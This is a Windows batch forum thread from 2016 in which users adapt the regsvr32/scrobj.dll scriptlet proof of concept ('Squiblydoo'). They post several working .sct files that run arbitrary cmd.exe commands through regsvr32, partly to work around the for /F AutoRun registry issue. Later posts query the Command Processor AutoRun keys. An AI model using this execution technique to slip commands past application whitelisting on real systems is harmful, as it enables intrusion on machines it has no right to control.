Regsrv32 exploit

Discussion forum for all Windows batch related topics.

Moderator: DosItHelp

Post Reply
Message
Author

jeb
Expert
Posts: 967
Joined: 30 Aug 2007 08:05
Location: Germany, Bochum

Re: Regsrv32 exploit

#2 Post by jeb » 26 Apr 2016 14:08

Nice, I tested it and it works :D

But I can't see a possibility to add parameters to the regsvr32 line.

As regsvr32 accepts a /c option, this could be useful for the FOR/F problem with autorun SO:How to specify /D in FOR command?.

Something like

Code: Select all

set "comspec=C:\windows\system32\regsvr32.exe"
set "WRAP=/s /n /u /i:file:///%~dp0wrapper.sct scrobj.dll"
for /F "delims=" %%A in ('%WRAP% echo %TIME%') do echo #%%A


But the wrapper.sct doesn't see the DIR command (currently).

wrapper.sct

Code: Select all

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Empire"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
   <!-- Proof Of Concept - Casey Smith @subTee -->
   <script language="JScript">
      <![CDATA[
   
         var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c");   
   
      ]]>
</script>
</registration>
</scriptlet>


The problem is, that it expands to

Code: Select all

regsvr32.exe /s /n /u /i:file:///c:\temp\wrapper.sct scrobj.dll echo 17:55:00

But wrapper.sct will not see the "echo 17:55:00"

npocmaka_
Posts: 495
Joined: 24 Jun 2013 17:10
Location: Bulgaria
Contact:

Re: Regsrv32 exploit

#3 Post by npocmaka_ » 27 Apr 2016 06:43

jeb wrote:Nice, I tested it and it works :D
...


The bad thing is that sct does not recognize WScript.Arguments nor can handle ('Scripting.FileSystemObject').GetStandardStream(1/0) because it is the regsrv that starts the file...

npocmaka_
Posts: 495
Joined: 24 Jun 2013 17:10
Location: Bulgaria
Contact:

Re: Regsrv32 exploit

#4 Post by npocmaka_ » 27 Apr 2016 15:24

But environment variables can be expanded in the sct file:

Code: Select all

set "wcom=pause"
set "comspec=C:\windows\system32\regsvr32.exe"
set "WRAP=/s /n /u /i:file:///%~dp0wrapper.sct scrobj.dll"
for /F "delims=" %%A in ('%WRAP%') do echo #%%A



and the wrapper:

Code: Select all

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Empire"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
   <!-- Proof Of Concept - Casey Smith @subTee -->
   <script language="JScript">
      <![CDATA[
      var r = new ActiveXObject("WScript.Shell");
      var command=r.ExpandEnvironmentStrings("%wcom%");
      r.Run("cmd.exe /c " + command);   
   
      ]]>
</script>
</registration>
</scriptlet>

npocmaka_
Posts: 495
Joined: 24 Jun 2013 17:10
Location: Bulgaria
Contact:

Re: Regsrv32 exploit

#5 Post by npocmaka_ » 27 Apr 2016 16:17

If WScript.Shell Exec() method is used instead of Run() the out can be read:

Code: Select all

@echo off
set "wcom=echo --#--&pause"
::set "comspec=C:\windows\system32\regsvr32.exe"
set "WRAP=/s /n /u /i:file:///%~dp0wrapper.sct scrobj.dll"
for /F "delims=" %%A in ('%WRAP%') do echo #%%A
regsvr32 /s /n /u /i:file:///%~dp0wrapper.sct scrobj.dll |more


and the wrapper:

Code: Select all

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Empire"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
   <!-- Proof Of Concept - Casey Smith @subTee -->
   <script language="JScript">
      <![CDATA[
      var r = new ActiveXObject("WScript.Shell");
      var command=r.ExpandEnvironmentStrings("%wcom%");
      var res=r.Exec("cmd.exe /c " + command);
      
        new ActiveXObject('Scripting.FileSystemObject').GetStandardStream(1).Write(res.StdOut.ReadLine());   
   
      ]]>
</script>
</registration>
</scriptlet>

jeb
Expert
Posts: 967
Joined: 30 Aug 2007 08:05
Location: Germany, Bochum

Re: Regsrv32 exploit

#6 Post by jeb » 28 Apr 2016 04:43

Nice work.

I changed the wrapper.sct to support more than one line of output.

Code: Select all

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="Empire"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
   <!-- Proof Of Concept - Casey Smith @subTee -->
   <script language="JScript">
      <![CDATA[
      var r = new ActiveXObject("WScript.Shell");
      var command=r.ExpandEnvironmentStrings("%wcom%");
      var res=r.Exec("cmd.exe /c \"" + command + "\"");
     
        var stdout=new ActiveXObject('Scripting.FileSystemObject').GetStandardStream(1);
      while ( !res.StdOut.AtEndOfStream)
      {
         stdout.WriteLine(res.StdOut.ReadLine() );
      }
      ]]>
</script>
</registration>
</scriptlet>

Sponge Belly
Posts: 199
Joined: 01 Oct 2012 13:32
Location: Ireland
Contact:

Re: Regsrv32 exploit

#7 Post by Sponge Belly » 06 May 2016 13:02

Hi Guys! :)

Fascinating discovery, but not even MS can ignore a security hole that big. No doubt it will be patched in an upcoming update. I’m more concerned with the AUTORUN issue, which I was unaware of until now.

Short of querying the Registry to make sure the AUTORUN key is empty whenever I want to use a for /f loop, what can I do about it? :?

Any suggestions appreciated.

- SB

npocmaka_
Posts: 495
Joined: 24 Jun 2013 17:10
Location: Bulgaria
Contact:

Re: Regsrv32 exploit

#8 Post by npocmaka_ » 12 May 2016 02:06

Sponge Belly wrote:Hi Guys! :)

Short of querying the Registry to make sure the AUTORUN key is empty whenever I want to use a for /f loop, what can I do about it? :?

Any suggestions appreciated.

- SB


What is this about?Can you give more info.

Ed Dyreen
Expert
Posts: 1569
Joined: 16 May 2011 08:21
Location: Flanders(Belgium)
Contact:

Re: Regsrv32 exploit

#9 Post by Ed Dyreen » 29 May 2016 02:29

It looks interesting but I don't understand this, what can a person do with this, how is this a security hole ?

Sponge Belly
Posts: 199
Joined: 01 Oct 2012 13:32
Location: Ireland
Contact:

Re: Regsrv32 exploit

#10 Post by Sponge Belly » 01 Jul 2016 15:30

Hi Vasil,

Sorry for the delay in replying. I was referring to the SO link Jeb mentioned in his reply to the OP. If I understand correctly, the following Registry keys are queried every time a for /f loop is executed:

Code: Select all

HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun


There is no way to prevent this short of using the wrapper developed by Jeb and yourself.

So my question is, how can I do the following?

  • Check if the Registry keys have values.
  • If true, save the values to temp variables, and delete the keys.
  • Execute my for /f loops safely.
  • Restore original values of keys.

Can a Batch file do this without triggering the UAC prompt? And finally, isn’t this an awful lot of work to handle a situation which will probably never arise?

Thanks! :)

- SB

foxidrive
Expert
Posts: 6033
Joined: 10 Feb 2012 02:20

Re: Regsrv32 exploit

#11 Post by foxidrive » 03 Jul 2016 06:08

Is this for your own use on your PC or is it to run on any persons PC?

Test this code to see if anything is printed to the screen above the 'press any key prompt'.
If reg query doesn't raise a UAC prompt then you can use it to set a variable to anything that is in these keys.

Code: Select all

@echo off
reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor" /v AutoRun 2>nul
reg query "HKEY_CURRENT_USER\Software\Microsoft\Command Processor" /v AutoRun 2>nul
pause & goto :EOF

Sponge Belly
Posts: 199
Joined: 01 Oct 2012 13:32
Location: Ireland
Contact:

Re: Regsrv32 exploit

#12 Post by Sponge Belly » 05 Sep 2016 10:39

Hi Foxi,

Thanks for your helpful suggestion and sorry for not replying sooner. I’ve been wracking my brains over this and I haven’t been able to come up with a practical solution. :(

Ideally, I want to write robust code that will work on all versions of Windows and won’t be tripped up by gotchas like commands stored in the AutoRun keys. But it’s such an unlikely edge case that the cost of regularly checking for it isn’t worth the effort.

- SB

PS: Maybe this is something your sccript to gather information could check for?

Post Reply